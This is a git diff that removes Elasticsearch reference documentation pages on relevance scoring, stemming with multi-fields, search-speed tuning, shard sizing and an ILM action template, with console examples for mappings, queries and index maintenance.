part of the score. -And these index statistics may be different across copies of the same shard -due to deleted documents. As you may know when documents are deleted or updated, -the old document is not immediately removed from the index, it is just marked -as deleted and it will only be removed from disk on the next time that the -segment this old document belongs to is merged. However for practical reasons, -those deleted documents are taken into account for index statistics. So imagine -that the primary shard just finished a large merge that removed lots of deleted -documents, then it might have index statistics that are sufficiently different -from the replica (which still have plenty of deleted documents) so that scores -are different too. - -The recommended way to work around this issue is to use a string that identifies -the user that is logged in (a user id or session id for instance) as a -<>. This ensures that all queries of a -given user are always going to hit the same shards, so scores remain more -consistent across queries. - -This work around has another benefit: when two documents have the same score, -they will be sorted by their internal Lucene doc id (which is unrelated to the -`_id`) by default. However these doc ids could be different across copies of -the same shard. 
So by always hitting the same shard, we would get more -consistent ordering of documents that have the same scores. - -[discrete] -==== Relevancy looks wrong - -If you notice that two documents with the same content get different scores or -that an exact match is not ranked first, then the issue might be related to -sharding. By default, Elasticsearch makes each shard responsible for producing -its own scores. However since index statistics are an important contributor to -the scores, this only works well if shards have similar index statistics. The -assumption is that since documents are routed evenly to shards by default, then -index statistics should be very similar and scoring would work as expected. -However in the event that you either: - - - use routing at index time, - - query multiple _indices_, - - or have too little data in your index - -then there are good chances that all shards that are involved in the search -request do not have similar index statistics and relevancy could be bad. - -If you have a small dataset, the easiest way to work around this issue is to -index everything into an index that has a single shard -(`index.number_of_shards: 1`), which is the default. Then index statistics -will be the same for all documents and scores will be consistent. - -Otherwise the recommended way to work around this issue is to use the -<> search type. This will make -Elasticsearch perform an initial round trip to all involved shards, asking -them for their index statistics relatively to the query, then the coordinating -node will merge those statistics and send the merged statistics alongside the -request when asking shards to perform the `query` phase, so that shards can -use these global statistics rather than their own statistics in order to do the -scoring. - -In most cases, this additional round trip should be very cheap. However in the -event that your query contains a very large number of fields/terms or fuzzy -queries, beware that gathering statistics alone might not be cheap since all -terms have to be looked up in the terms dictionaries in order to look up -statistics. - -[[static-scoring-signals]] -=== Incorporating static relevance signals into the score - -Many domains have static signals that are known to be correlated with relevance. -For instance {wikipedia}/PageRank[PageRank] and url length are -two commonly used features for web search in order to tune the score of web -pages independently of the query. - -There are two main queries that allow combining static score contributions with -textual relevance, eg. as computed with BM25: - - <> - - <> - -For instance imagine that you have a `pagerank` field that you wish to -combine with the BM25 score so that the final score is equal to -`score = bm25_score + pagerank / (10 + pagerank)`. 
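To make the shape of that formula concrete (the numbers are purely
illustrative): a document with `pagerank: 10` gets a static bonus of
`10 / (10 + 10) = 0.5`, a document with `pagerank: 90` gets
`90 / (90 + 10) = 0.9`, and the bonus approaches but never reaches `1` for
arbitrarily large values. The `10` acts as a pivot, the value at which the
signal contributes half of its maximum, which is what the `saturation`
function and the `pivot` parameter express in the two queries below.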
- -With the <> the query would -look like this: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "body": { - "type": "text" - }, - "pagerank": { - "type": "long" - } - } - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "script_score": { - "query": { - "match": { "body": "elasticsearch" } - }, - "script": { - "source": "_score * saturation(doc['pagerank'].value, 10)" <1> - } - } - } -} --------------------------------------------------- -//TEST[continued] - -<1> `pagerank` must be mapped as a <> - -while with the <> it would -look like below: - -////////////////////////// - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "body": { - "type": "text" - }, - "pagerank": { - "type": "rank_feature" - } - } - } -} --------------------------------------------------- -// TEST - -////////////////////////// - -[source,console] --------------------------------------------------- -GET _search -{ - "query": { - "bool": { - "must": { - "match": { "body": "elasticsearch" } - }, - "should": { - "rank_feature": { - "field": "pagerank", <1> - "saturation": { - "pivot": 10 - } - } - } - } - } -} --------------------------------------------------- - -<1> `pagerank` must be mapped as a <> field - -While both options would return similar scores, there are trade-offs: -<> provides a lot of flexibility, -enabling you to combine the text relevance score with static signals as you -prefer. On the other hand, the <> only -exposes a couple ways to incorporate static signails into the score. However, -it relies on the <> and -<> fields, which index values in a special way -that allows the <> to skip -over non-competitive documents and get the top matches of a query faster. diff --git a/docs/reference/how-to/recipes/stemming.asciidoc b/docs/reference/how-to/recipes/stemming.asciidoc deleted file mode 100644 index 462998c82b3..00000000000 --- a/docs/reference/how-to/recipes/stemming.asciidoc +++ /dev/null @@ -1,229 +0,0 @@ -[[mixing-exact-search-with-stemming]] -=== Mixing exact search with stemming - -When building a search application, stemming is often a must as it is desirable -for a query on `skiing` to match documents that contain `ski` or `skis`. But -what if a user wants to search for `skiing` specifically? 
The typical way to do -this would be to use a <> in order to have the same -content indexed in two different ways: - -[source,console] --------------------------------------------------- -PUT index -{ - "settings": { - "analysis": { - "analyzer": { - "english_exact": { - "tokenizer": "standard", - "filter": [ - "lowercase" - ] - } - } - } - }, - "mappings": { - "properties": { - "body": { - "type": "text", - "analyzer": "english", - "fields": { - "exact": { - "type": "text", - "analyzer": "english_exact" - } - } - } - } - } -} - -PUT index/_doc/1 -{ - "body": "Ski resort" -} - -PUT index/_doc/2 -{ - "body": "A pair of skis" -} - -POST index/_refresh --------------------------------------------------- - -With such a setup, searching for `ski` on `body` would return both documents: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "simple_query_string": { - "fields": [ "body" ], - "query": "ski" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 2, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 2, - "relation": "eq" - }, - "max_score": 0.18232156, - "hits": [ - { - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 0.18232156, - "_source": { - "body": "Ski resort" - } - }, - { - "_index": "index", - "_type": "_doc", - "_id": "2", - "_score": 0.18232156, - "_source": { - "body": "A pair of skis" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 2,/"took": "$body.took",/] - -On the other hand, searching for `ski` on `body.exact` would only return -document `1` since the analysis chain of `body.exact` does not perform -stemming. - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "simple_query_string": { - "fields": [ "body.exact" ], - "query": "ski" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 1, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.8025915, - "hits": [ - { - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 0.8025915, - "_source": { - "body": "Ski resort" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 1,/"took": "$body.took",/] - -This is not something that is easy to expose to end users, as we would need to -have a way to figure out whether they are looking for an exact match or not and -redirect to the appropriate field accordingly. Also what to do if only parts of -the query need to be matched exactly while other parts should still take -stemming into account? - -Fortunately, the `query_string` and `simple_query_string` queries have a feature -that solves this exact problem: `quote_field_suffix`. 
This tells Elasticsearch -that the words that appear in between quotes are to be redirected to a different -field, see below: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "simple_query_string": { - "fields": [ "body" ], - "quote_field_suffix": ".exact", - "query": "\"ski\"" - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took": 2, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.8025915, - "hits": [ - { - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 0.8025915, - "_source": { - "body": "Ski resort" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 2,/"took": "$body.took",/] - -In the above case, since `ski` was in-between quotes, it was searched on the -`body.exact` field due to the `quote_field_suffix` parameter, so only document -`1` matched. This allows users to mix exact search with stemmed search as they -like. - -NOTE: If the choice of field passed in `quote_field_suffix` does not exist -the search will fall back to using the default field for the query string. diff --git a/docs/reference/how-to/search-speed.asciidoc b/docs/reference/how-to/search-speed.asciidoc deleted file mode 100644 index e51c7fa2b78..00000000000 --- a/docs/reference/how-to/search-speed.asciidoc +++ /dev/null @@ -1,536 +0,0 @@ -[[tune-for-search-speed]] -== Tune for search speed - -[discrete] -=== Give memory to the filesystem cache - -Elasticsearch heavily relies on the filesystem cache in order to make search -fast. In general, you should make sure that at least half the available memory -goes to the filesystem cache so that Elasticsearch can keep hot regions of the -index in physical memory. - -[discrete] -=== Use faster hardware - -If your search is I/O bound, you should investigate giving more memory to the -filesystem cache (see above) or buying faster drives. In particular SSD drives -are known to perform better than spinning disks. Always use local storage, -remote filesystems such as `NFS` or `SMB` should be avoided. Also beware of -virtualized storage such as Amazon's `Elastic Block Storage`. Virtualized -storage works very well with Elasticsearch, and it is appealing since it is so -fast and simple to set up, but it is also unfortunately inherently slower on an -ongoing basis when compared to dedicated local storage. If you put an index on -`EBS`, be sure to use provisioned IOPS otherwise operations could be quickly -throttled. - -If your search is CPU-bound, you should investigate buying faster CPUs. - -[discrete] -=== Document modeling - -Documents should be modeled so that search-time operations are as cheap as possible. - -In particular, joins should be avoided. <> can make queries -several times slower and <> relations can make -queries hundreds of times slower. So if the same questions can be answered without -joins by denormalizing documents, significant speedups can be expected. - -[discrete] -[[search-as-few-fields-as-possible]] -=== Search as few fields as possible - -The more fields a <> or -<> query targets, the slower it is. -A common technique to improve search speed over multiple fields is to copy -their values into a single field at index time, and then use this field at -search time. 
This can be automated with the <> directive of -mappings without having to change the source of documents. Here is an example -of an index containing movies that optimizes queries that search over both the -name and the plot of the movie by indexing both values into the `name_and_plot` -field. - -[source,console] --------------------------------------------------- -PUT movies -{ - "mappings": { - "properties": { - "name_and_plot": { - "type": "text" - }, - "name": { - "type": "text", - "copy_to": "name_and_plot" - }, - "plot": { - "type": "text", - "copy_to": "name_and_plot" - } - } - } -} --------------------------------------------------- - -[discrete] -=== Pre-index data - -You should leverage patterns in your queries to optimize the way data is indexed. -For instance, if all your documents have a `price` field and most queries run -<> aggregations on a fixed -list of ranges, you could make this aggregation faster by pre-indexing the ranges -into the index and using a <> -aggregations. - -For instance, if documents look like: - -[source,console] --------------------------------------------------- -PUT index/_doc/1 -{ - "designation": "spoon", - "price": 13 -} --------------------------------------------------- - -and search requests look like: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "aggs": { - "price_ranges": { - "range": { - "field": "price", - "ranges": [ - { "to": 10 }, - { "from": 10, "to": 100 }, - { "from": 100 } - ] - } - } - } -} --------------------------------------------------- -// TEST[continued] - -Then documents could be enriched by a `price_range` field at index time, which -should be mapped as a <>: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "price_range": { - "type": "keyword" - } - } - } -} - -PUT index/_doc/1 -{ - "designation": "spoon", - "price": 13, - "price_range": "10-100" -} --------------------------------------------------- - -And then search requests could aggregate this new field rather than running a -`range` aggregation on the `price` field. - -[source,console] --------------------------------------------------- -GET index/_search -{ - "aggs": { - "price_ranges": { - "terms": { - "field": "price_range" - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[discrete] -[[map-ids-as-keyword]] -=== Consider mapping identifiers as `keyword` - -include::../mapping/types/numeric.asciidoc[tag=map-ids-as-keyword] - -[discrete] -=== Avoid scripts - -If possible, avoid using <> or -<> in searches. See -<>. - - -[discrete] -=== Search rounded dates - -Queries on date fields that use `now` are typically not cacheable since the -range that is being matched changes all the time. However switching to a -rounded date is often acceptable in terms of user experience, and has the -benefit of making better use of the query cache. 
- -For instance the below query: - -[source,console] --------------------------------------------------- -PUT index/_doc/1 -{ - "my_date": "2016-05-11T16:30:55.328Z" -} - -GET index/_search -{ - "query": { - "constant_score": { - "filter": { - "range": { - "my_date": { - "gte": "now-1h", - "lte": "now" - } - } - } - } - } -} --------------------------------------------------- - -could be replaced with the following query: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "constant_score": { - "filter": { - "range": { - "my_date": { - "gte": "now-1h/m", - "lte": "now/m" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -In that case we rounded to the minute, so if the current time is `16:31:29`, -the range query will match everything whose value of the `my_date` field is -between `15:31:00` and `16:31:59`. And if several users run a query that -contains this range in the same minute, the query cache could help speed things -up a bit. The longer the interval that is used for rounding, the more the query -cache can help, but beware that too aggressive rounding might also hurt user -experience. - - -NOTE: It might be tempting to split ranges into a large cacheable part and -smaller not cacheable parts in order to be able to leverage the query cache, -as shown below: - -[source,console] --------------------------------------------------- -GET index/_search -{ - "query": { - "constant_score": { - "filter": { - "bool": { - "should": [ - { - "range": { - "my_date": { - "gte": "now-1h", - "lte": "now-1h/m" - } - } - }, - { - "range": { - "my_date": { - "gt": "now-1h/m", - "lt": "now/m" - } - } - }, - { - "range": { - "my_date": { - "gte": "now/m", - "lte": "now" - } - } - } - ] - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -However such practice might make the query run slower in some cases since the -overhead introduced by the `bool` query may defeat the savings from better -leveraging the query cache. - -[discrete] -=== Force-merge read-only indices - -Indices that are read-only may benefit from being <>. This is typically the case with time-based indices: -only the index for the current time frame is getting new documents while older -indices are read-only. Shards that have been force-merged into a single segment -can use simpler and more efficient data structures to perform searches. - -IMPORTANT: Do not force-merge indices to which you are still writing, or to -which you will write again in the future. Instead, rely on the automatic -background merge process to perform merges as needed to keep the index running -smoothly. If you continue to write to a force-merged index then its performance -may become much worse. - -[discrete] -=== Warm up global ordinals - -<> are a data structure that is used to -optimize the performance of aggregations. They are calculated lazily and stored in -the JVM heap as part of the <>. For fields -that are heavily used for bucketing aggregations, you can tell {es} to construct -and cache the global ordinals before requests are received. This should be done -carefully because it will increase heap usage and can make <> -take longer. 
The option can be updated dynamically on an existing mapping by -setting the <> mapping parameter: - -[source,console] --------------------------------------------------- -PUT index -{ - "mappings": { - "properties": { - "foo": { - "type": "keyword", - "eager_global_ordinals": true - } - } - } -} --------------------------------------------------- - -[discrete] -=== Warm up the filesystem cache - -If the machine running Elasticsearch is restarted, the filesystem cache will be -empty, so it will take some time before the operating system loads hot regions -of the index into memory so that search operations are fast. You can explicitly -tell the operating system which files should be loaded into memory eagerly -depending on the file extension using the -<> setting. - -WARNING: Loading data into the filesystem cache eagerly on too many indices or -too many files will make search _slower_ if the filesystem cache is not large -enough to hold all the data. Use with caution. - -[discrete] -=== Use index sorting to speed up conjunctions - -<> can be useful in order to make -conjunctions faster at the cost of slightly slower indexing. Read more about it -in the <>. - -[discrete] -[[preference-cache-optimization]] -=== Use `preference` to optimize cache utilization - -There are multiple caches that can help with search performance, such as the -{wikipedia}/Page_cache[filesystem cache], the -<> or the <>. Yet -all these caches are maintained at the node level, meaning that if you run the -same request twice in a row, have 1 <> or more -and use {wikipedia}/Round-robin_DNS[round-robin], the default -routing algorithm, then those two requests will go to different shard copies, -preventing node-level caches from helping. - -Since it is common for users of a search application to run similar requests -one after another, for instance in order to analyze a narrower subset of the -index, using a preference value that identifies the current user or session -could help optimize usage of the caches. - -[discrete] -=== Replicas might help with throughput, but not always - -In addition to improving resiliency, replicas can help improve throughput. For -instance if you have a single-shard index and three nodes, you will need to -set the number of replicas to 2 in order to have 3 copies of your shard in -total so that all nodes are utilized. - -Now imagine that you have a 2-shards index and two nodes. In one case, the -number of replicas is 0, meaning that each node holds a single shard. In the -second case the number of replicas is 1, meaning that each node has two shards. -Which setup is going to perform best in terms of search performance? Usually, -the setup that has fewer shards per node in total will perform better. The -reason for that is that it gives a greater share of the available filesystem -cache to each shard, and the filesystem cache is probably Elasticsearch's -number 1 performance factor. At the same time, beware that a setup that does -not have replicas is subject to failure in case of a single node failure, so -there is a trade-off between throughput and availability. - -So what is the right number of replicas? If you have a cluster that has -`num_nodes` nodes, `num_primaries` primary shards _in total_ and if you want to -be able to cope with `max_failures` node failures at once at most, then the -right number of replicas for you is -`max(max_failures, ceil(num_nodes / num_primaries) - 1)`. 
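As a quick worked example, the single-shard index on three nodes described
above (`num_primaries = 1`, `num_nodes = 3`) with a tolerance for one node
failure needs `max(1, ceil(3 / 1) - 1) = max(1, 2) = 2` replicas, matching the
earlier recommendation. A hypothetical 10-node cluster with 5 primaries that
must survive a single node failure needs
`max(1, ceil(10 / 5) - 1) = max(1, 1) = 1` replica.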
- -=== Tune your queries with the Profile API - -You can also analyse how expensive each component of your queries and -aggregations are using the {ref}/search-profile.html[Profile API]. This might -allow you to tune your queries to be less expensive, resulting in a positive -performance result and reduced load. Also note that Profile API payloads can be -easily visualised for better readability in the -{kibana-ref}/xpack-profiler.html[Search Profiler], which is a Kibana dev tools -UI available in all X-Pack licenses, including the free X-Pack Basic license. - -Some caveats to the Profile API are that: - - - the Profile API as a debugging tool adds significant overhead to search execution and can also have a very verbose output - - given the added overhead, the resulting took times are not reliable indicators of actual took time, but can be used comparatively between clauses for relative timing differences - - the Profile API is best for exploring possible reasons behind the most costly clauses of a query but isn't intended for accurately measuring absolute timings of each clause - -[[faster-phrase-queries]] -=== Faster phrase queries with `index_phrases` - -The <> field has an <> option that -indexes 2-shingles and is automatically leveraged by query parsers to run phrase -queries that don't have a slop. If your use-case involves running lots of phrase -queries, this can speed up queries significantly. - -[[faster-prefix-queries]] -=== Faster prefix queries with `index_prefixes` - -The <> field has an <> option that -indexes prefixes of all terms and is automatically leveraged by query parsers to -run prefix queries. If your use-case involves running lots of prefix queries, -this can speed up queries significantly. - -[[faster-filtering-with-constant-keyword]] -=== Use `constant_keyword` to speed up filtering - -There is a general rule that the cost of a filter is mostly a function of the -number of matched documents. Imagine that you have an index containing cycles. -There are a large number of bicycles and many searches perform a filter on -`cycle_type: bicycle`. This very common filter is unfortunately also very costly -since it matches most documents. There is a simple way to avoid running this -filter: move bicycles to their own index and filter bicycles by searching this -index instead of adding a filter to the query. - -Unfortunately this can make client-side logic tricky, which is where -`constant_keyword` helps. By mapping `cycle_type` as a `constant_keyword` with -value `bicycle` on the index that contains bicycles, clients can keep running -the exact same queries as they used to run on the monolithic index and -Elasticsearch will do the right thing on the bicycles index by ignoring filters -on `cycle_type` if the value is `bicycle` and returning no hits otherwise. - -Here is what mappings could look like: - -[source,console] --------------------------------------------------- -PUT bicycles -{ - "mappings": { - "properties": { - "cycle_type": { - "type": "constant_keyword", - "value": "bicycle" - }, - "name": { - "type": "text" - } - } - } -} - -PUT other_cycles -{ - "mappings": { - "properties": { - "cycle_type": { - "type": "keyword" - }, - "name": { - "type": "text" - } - } - } -} --------------------------------------------------- - -We are splitting our index in two: one that will contain only bicycles, and -another one that contains other cycles: unicycles, tricycles, etc. Then at -search time, we need to search both indices, but we don't need to modify -queries. 
-
-
-[source,console]
---------------------------------------------------
-GET bicycles,other_cycles/_search
-{
-  "query": {
-    "bool": {
-      "must": {
-        "match": {
-          "description": "dutch"
-        }
-      },
-      "filter": {
-        "term": {
-          "cycle_type": "bicycle"
-        }
-      }
-    }
-  }
-}
---------------------------------------------------
-// TEST[continued]
-
-On the `bicycles` index, Elasticsearch will simply ignore the `cycle_type`
-filter and rewrite the search request to the one below:
-
-[source,console]
---------------------------------------------------
-GET bicycles,other_cycles/_search
-{
-  "query": {
-    "match": {
-      "description": "dutch"
-    }
-  }
-}
---------------------------------------------------
-// TEST[continued]
-
-On the `other_cycles` index, Elasticsearch will quickly figure out that
-`bicycle` doesn't exist in the terms dictionary of the `cycle_type` field and
-return a search response with no hits.
-
-This is a powerful way of making queries cheaper by putting common values in a
-dedicated index. This idea can also be combined across multiple fields: for
-instance, if you track the color of each cycle and your `bicycles` index ends
-up containing mostly black bikes, you could split it into `bicycles-black` and
-`bicycles-other-colors` indices.
-
-The `constant_keyword` field is not strictly required for this optimization:
-it is also possible to update the client-side logic in order to route queries
-to the relevant indices based on filters. However, `constant_keyword` makes
-this transparent and lets you decouple search requests from the index topology
-in exchange for very little overhead.
diff --git a/docs/reference/how-to/size-your-shards.asciidoc b/docs/reference/how-to/size-your-shards.asciidoc
deleted file mode 100644
index 1bc9b050b19..00000000000
--- a/docs/reference/how-to/size-your-shards.asciidoc
+++ /dev/null
@@ -1,288 +0,0 @@
-[[size-your-shards]]
-== How to size your shards
-++++
-Size your shards
-++++
-
-To protect against hardware failure and increase capacity, {es} stores copies of
-an index’s data across multiple shards on multiple nodes. The number and size of
-these shards can have a significant impact on your cluster's health. One common
-problem is _oversharding_, a situation in which a cluster with a large number of
-shards becomes unstable.
-
-[discrete]
-[[create-a-sharding-strategy]]
-=== Create a sharding strategy
-
-The best way to prevent oversharding and other shard-related issues
-is to create a sharding strategy. A sharding strategy helps you determine and
-maintain the optimal number of shards for your cluster while limiting the size
-of those shards.
-
-Unfortunately, there is no one-size-fits-all sharding strategy. A strategy that
-works in one environment may not scale in another. A good sharding strategy must
-account for your infrastructure, use case, and performance expectations.
-
-The best way to create a sharding strategy is to benchmark your production data
-on production hardware using the same queries and indexing loads you'd see in
-production. For our recommended methodology, watch the
-https://www.elastic.co/elasticon/conf/2016/sf/quantitative-cluster-sizing[quantitative
-cluster sizing video]. As you test different shard configurations, use {kib}'s
-{kibana-ref}/elasticsearch-metrics.html[{es} monitoring tools] to track your
-cluster's stability and performance.
-
-The following sections provide some reminders and guidelines you should consider
-when designing your sharding strategy. If your cluster has shard-related
-problems, see <>.
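When running the benchmarks described above, a quick way to see the shard
counts and sizes that a given configuration produces is the cat shards API,
sorted here by on-disk size (a convenience sketch rather than part of the
formal methodology):

[source,console]
----
GET _cat/shards?v=true&s=store:desc
----
// TEST[setup:my_index]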
- -[discrete] -[[shard-sizing-considerations]] -=== Sizing considerations - -Keep the following things in mind when building your sharding strategy. - -[discrete] -[[single-thread-per-shard]] -==== Searches run on a single thread per shard - -Most searches hit multiple shards. Each shard runs the search on a single -CPU thread. While a shard can run multiple concurrent searches, searches across a -large number of shards can deplete a node's <>. This can result in low throughput and slow search speeds. - -[discrete] -[[each-shard-has-overhead]] -==== Each shard has overhead - -Every shard uses memory and CPU resources. In most cases, a small -set of large shards uses fewer resources than many small shards. - -Segments play a big role in a shard's resource usage. Most shards contain -several segments, which store its index data. {es} keeps segment metadata in -<> so it can be quickly retrieved for searches. As a -shard grows, its segments are <> into fewer, larger -segments. This decreases the number of segments, which means less metadata is -kept in heap memory. - -[discrete] -[[shard-auto-balance]] -==== {es} automatically balances shards within a data tier - -A cluster's nodes are grouped into <>. Within each tier, -{es} attempts to spread an index's shards across as many nodes as possible. When -you add a new node or a node fails, {es} automatically rebalances the index's -shards across the tier's remaining nodes. - -[discrete] -[[shard-size-best-practices]] -=== Best practices - -Where applicable, use the following best practices as starting points for your -sharding strategy. - -[discrete] -[[delete-indices-not-documents]] -==== Delete indices, not documents - -Deleted documents aren't immediately removed from {es}'s file system. -Instead, {es} marks the document as deleted on each related shard. The marked -document will continue to use resources until it's removed during a periodic -<>. - -When possible, delete entire indices instead. {es} can immediately remove -deleted indices directly from the file system and free up resources. - -[discrete] -[[use-ds-ilm-for-time-series]] -==== Use data streams and {ilm-init} for time series data - -<> let you store time series data across multiple, -time-based backing indices. You can use <> to automatically manage these backing indices. - -[role="screenshot"] -image:images/ilm/index-lifecycle-policies.png[] - -One advantage of this setup is -<>, which creates -a new write index when the current one meets a defined `max_age`, `max_docs`, or -`max_size` threshold. You can use these thresholds to create indices based on -your retention intervals. When an index is no longer needed, you can use -{ilm-init} to automatically delete it and free up resources. - -{ilm-init} also makes it easy to change your sharding strategy over time: - -* *Want to decrease the shard count for new indices?* + -Change the <> setting in the -data stream's <>. - -* *Want larger shards?* + -Increase your {ilm-init} policy's <>. - -* *Need indices that span shorter intervals?* + -Offset the increased shard count by deleting older indices sooner. You can do -this by lowering the `min_age` threshold for your policy's -<>. - -Every new backing index is an opportunity to further tune your strategy. - -[discrete] -[[shard-size-recommendation]] -==== Aim for shard sizes between 10GB and 50GB - -Shards larger than 50GB may make a cluster less likely to recover from failure. -When a node fails, {es} rebalances the node's shards across the data tier's -remaining nodes. 
Shards larger than 50GB can be harder to move across a network -and may tax node resources. - -[discrete] -[[shard-count-recommendation]] -==== Aim for 20 shards or fewer per GB of heap memory - -The number of shards a node can hold is proportional to the node's -<>. For example, a node with 30GB of heap memory should -have at most 600 shards. The further below this limit you can keep your nodes, -the better. If you find your nodes exceeding more than 20 shards per GB, -consider adding another node. You can use the <> to -check the number of shards per node. - -[source,console] ----- -GET _cat/shards?v=true ----- -// TEST[setup:my_index] - -To use compressed pointers and save memory, we -recommend each node have a maximum heap size of 32GB or 50% of the node's -available memory, whichever is lower. See <>. - - -[discrete] -[[avoid-node-hotspots]] -==== Avoid node hotspots - -If too many shards are allocated to a specific node, the node can become a -hotspot. For example, if a single node contains too many shards for an index -with a high indexing volume, the node is likely to have issues. - -To prevent hotspots, use the -<> index -setting to explicitly limit the number of shards on a single node. You can -configure `index.routing.allocation.total_shards_per_node` using the -<>. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_settings -{ - "index" : { - "routing.allocation.total_shards_per_node" : 5 - } -} --------------------------------------------------- -// TEST[setup:my_index] - - -[discrete] -[[fix-an-oversharded-cluster]] -=== Fix an oversharded cluster - -If your cluster is experiencing stability issues due to oversharded indices, -you can use one or more of the following methods to fix them. - -[discrete] -[[reindex-indices-from-shorter-periods-into-longer-periods]] -==== Create time-based indices that cover longer periods - -For time series data, you can create indices that cover longer time intervals. -For example, instead of daily indices, you can create indices on a monthly or -yearly basis. - -If you're using {ilm-init}, you can do this by increasing the `max_age` -threshold for the <>. - -If your retention policy allows it, you can also create larger indices by -omitting a `max_age` threshold and using `max_docs` and/or `max_size` -thresholds instead. - -[discrete] -[[delete-empty-indices]] -==== Delete empty or unneeded indices - -If you're using {ilm-init} and roll over indices based on a `max_age` threshold, -you can inadvertently create indices with no documents. These empty indices -provide no benefit but still consume resources. - -You can find these empty indices using the <>. - -[source,console] ----- -GET /_cat/count/my-index-000001?v=true ----- -// TEST[setup:my_index] - -Once you have a list of empty indices, you can delete them using the -<>. You can also delete any other -unneeded indices. - -[source,console] ----- -DELETE /my-index-* ----- -// TEST[setup:my_index] - -[discrete] -[[force-merge-during-off-peak-hours]] -==== Force merge during off-peak hours - -If you no longer write to an index, you can use the <> to <> smaller segments into larger ones. -This can reduce shard overhead and improve search speeds. However, force merges -are resource-intensive. If possible, run the force merge during off-peak hours. 
- -[source,console] ----- -POST /my-index-000001/_forcemerge ----- -// TEST[setup:my_index] - -[discrete] -[[shrink-existing-index-to-fewer-shards]] -==== Shrink an existing index to fewer shards - -If you no longer write to an index, you can use the -<> to reduce its shard count. - -[source,console] ----- -POST /my-index-000001/_shrink/my-shrunken-index-000001 ----- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":2,"blocks.write":true}}\n/] - -{ilm-init} also has a <> for indices in the -warm phase. - -[discrete] -[[combine-smaller-indices]] -==== Combine smaller indices - -You can also use the <> to combine indices -with similar mappings into a single large index. For time series data, you could -reindex indices for short time periods into a new index covering a -longer period. For example, you could reindex daily indices from October with a -shared index pattern, such as `my-index-2099.10.11`, into a monthly -`my-index-2099.10` index. After the reindex, delete the smaller indices. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "my-index-2099.10.*" - }, - "dest": { - "index": "my-index-2099.10" - } -} ----- diff --git a/docs/reference/ilm/actions/_ilm-action-template.asciidoc b/docs/reference/ilm/actions/_ilm-action-template.asciidoc deleted file mode 100644 index 29ce79ceb49..00000000000 --- a/docs/reference/ilm/actions/_ilm-action-template.asciidoc +++ /dev/null @@ -1,94 +0,0 @@ -//// -This is a template for ILM action reference documentation. - -To document a new action, copy this file, remove comments like this, and -replace "sample" with the appropriate action name. - -Ensure the new action docs are linked and included in -docs/reference/ilm/actions.asciidoc -//// - -[role="xpack"] -[[ilm-sample]] -=== Sample - -Phases allowed: hot, warm, cold, delete. - -//// -INTRO -Include a brief, 1-2 sentence description. -//// - -Does a cool thing. - -[[ilm-sample-options]] -==== Options - -//// -Definition list of the options that can be specified for the action: - -If there are no options: - -None. -//// - -`sample_option1`:: -(Optional, integer) -Number of something. - -`sample_option2`:: -(Required, string) -Name of something. - -[[ilm-sample-ex]] -==== Example - -//// -Basic example of configuring the action in an ILM policy. - -Additional examples are optional. -//// - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "sample" : { - "sample_option1" : 2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[skip: Replace fake actions and remove this comment.] - -[[ilm-sample2-ex]] -===== Describe example - -The sample action in the following policy does something interesting. - -[source,console] --------------------------------------------------- -PUT _ilm/policy/my_policy -{ - "policy": { - "phases": { - "warm": { - "actions": { - "sample" : { - "sample_option1" : 100, - "sample_option2" : "interesting" - } - } - } - } - } -} --------------------------------------------------- -// TEST[skip: Replace fake actions and remove this comment.] diff --git a/docs/reference/ilm/actions/ilm-allocate.asciidoc b/docs/reference/ilm/actions/ilm-allocate.asciidoc deleted file mode 100644 index 1dd181ebc44..00000000000 --- a/docs/reference/ilm/actions/ilm-allocate.asciidoc +++ /dev/null @@ -1,158 +0,0 @@ -[role="xpack"] -[[ilm-allocate]] -=== Allocate - -Phases allowed: warm, cold. 
